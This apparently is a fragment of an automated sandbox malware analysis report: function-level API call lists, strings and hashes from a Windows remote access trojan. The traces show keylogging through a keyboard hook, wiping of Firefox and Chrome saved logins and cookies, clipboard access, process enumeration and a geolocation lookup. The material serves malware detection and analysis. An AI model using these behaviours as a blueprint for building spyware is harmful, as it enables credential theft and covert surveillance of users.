                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: 4f878cdabca864fd8e4def977261fe52710bfc74ce83ff2ab3961b6b62e1e906
                                • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                • Opcode Fuzzy Hash: 4f878cdabca864fd8e4def977261fe52710bfc74ce83ff2ab3961b6b62e1e906
                                • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                • FindClose.KERNEL32(00000000), ref: 0040AE11
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 52877667f45bbdd0b760bf8b0047ed44bccf1c1249d05f9fca9df81a73d20b2f
                                • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                • Opcode Fuzzy Hash: 52877667f45bbdd0b760bf8b0047ed44bccf1c1249d05f9fca9df81a73d20b2f
                                • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                APIs
                                • OpenClipboard.USER32 ref: 00414EC2
                                • EmptyClipboard.USER32 ref: 00414ED0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                • CloseClipboard.USER32 ref: 00414F55
                                • OpenClipboard.USER32 ref: 00414F5C
                                • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                • CloseClipboard.USER32 ref: 00414F84
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmpty
                                • String ID:
                                • API String ID: 2339235153-0
                                • Opcode ID: 798685ff07400f3cc401de33015aba2ed73e94d92061d2a6da5efc927610f1a7
                                • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                • Opcode Fuzzy Hash: 798685ff07400f3cc401de33015aba2ed73e94d92061d2a6da5efc927610f1a7
                                • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7
                                • API String ID: 0-3177665633
                                • Opcode ID: a8d0df93e5f8a066e7b011b6a1d3a7de81d979cc05f74ce077101d6e7286cc23
                                • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                • Opcode Fuzzy Hash: a8d0df93e5f8a066e7b011b6a1d3a7de81d979cc05f74ce077101d6e7286cc23
                                • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                • GetLastError.KERNEL32 ref: 00418771
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: 7dc84aa95a530a12f7e1af1ae2f547e3e1bde7312f3904c2f4f2d116fd88398b
                                • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                • Opcode Fuzzy Hash: 7dc84aa95a530a12f7e1af1ae2f547e3e1bde7312f3904c2f4f2d116fd88398b
                                • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: 7eade7ae559396b91c788499e28af31718b33c23fa40b722cb0a54370978db76
                                • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                • Opcode Fuzzy Hash: 7eade7ae559396b91c788499e28af31718b33c23fa40b722cb0a54370978db76
                                • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID:
                                • API String ID: 2341273852-0
                                • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                APIs
                                  • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                • SetLastError.KERNEL32(0000000E), ref: 0041082E
                                  • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                                • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                                • SetLastError.KERNEL32(0000045A), ref: 0041098F
                                  • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                                  • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID: $.F
                                • API String ID: 3950776272-1421728423
                                • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                • GetLastError.KERNEL32 ref: 00409375
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                • TranslateMessage.USER32(?), ref: 004093D2
                                • DispatchMessageA.USER32(?), ref: 004093DD
                                Strings
                                • Keylogger initialization failure: error , xrefs: 00409389
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: 4c2ffb5bfab47b4d6a89f4109e67b78fa61f5e07fcbe4fa4259a912f8e120c6b
                                • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                • Opcode Fuzzy Hash: 4c2ffb5bfab47b4d6a89f4109e67b78fa61f5e07fcbe4fa4259a912f8e120c6b
                                • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProc
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 1563625733-314212984
                                • Opcode ID: 1ec30fb3ba388965c3b7a9bbad0bfcd44499e4205dedceef393d860d1584ff54
                                • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                • Opcode Fuzzy Hash: 1ec30fb3ba388965c3b7a9bbad0bfcd44499e4205dedceef393d860d1584ff54
                                • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                APIs
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                  • Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F3B
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                  • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                  • Part of subcall function 00419F51: IsWow64Process.KERNEL32(00000000,?,?,?,00000001), ref: 00419F71
                                  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Process32$NextOpenWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID: XAF
                                • API String ID: 44284711-3946003707
                                • Opcode ID: d8d45d1d9df1b72d477be03f2b11192304299260eec88e848f1da2b4f560b105
                                • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                • Opcode Fuzzy Hash: d8d45d1d9df1b72d477be03f2b11192304299260eec88e848f1da2b4f560b105
                                • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                APIs
                                  • Part of subcall function 00411F34: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                  • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                                  • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                • ExitProcess.KERNEL32 ref: 0040E2B4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 3.8.0 Pro$h5S$override$pth_unenc
                                • API String ID: 2281282204-476828247
                                • Opcode ID: 7885c52482673bc6b5baf0f2f22fafa2bf54de89e443a5fbd8526dcc006b68a3
                                • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                • Opcode Fuzzy Hash: 7885c52482673bc6b5baf0f2f22fafa2bf54de89e443a5fbd8526dcc006b68a3
                                • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                • InternetCloseHandle.WININET(00000000), ref: 00419407
                                • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 004193A2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: 540abcb8f3db5f1b90760da06915a3e05ee1988b6862bc4c933283d7aac23dac
                                • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                • Opcode Fuzzy Hash: 540abcb8f3db5f1b90760da06915a3e05ee1988b6862bc4c933283d7aac23dac
                                • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                • GetLastError.KERNEL32 ref: 0040A999
                                Strings
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                • UserProfile, xrefs: 0040A95F
                                • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: de97d65e3799a6e0596e62218f2c5adfc51664b458c632a8240d65e96125f996
                                • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                • Opcode Fuzzy Hash: de97d65e3799a6e0596e62218f2c5adfc51664b458c632a8240d65e96125f996
                                • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                • GetLastError.KERNEL32 ref: 00415CDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                • Opcode ID: 589046edef66d61ef49ed9f9c63f4fb896bb0cb7d404074a64385ab32ff8d038
                                • Instruction ID: 053c4da9c4e9401cc5e8c6747fb67a0461d28ab3294dbb24078e68a968df4fbd
                                • Opcode Fuzzy Hash: 589046edef66d61ef49ed9f9c63f4fb896bb0cb7d404074a64385ab32ff8d038
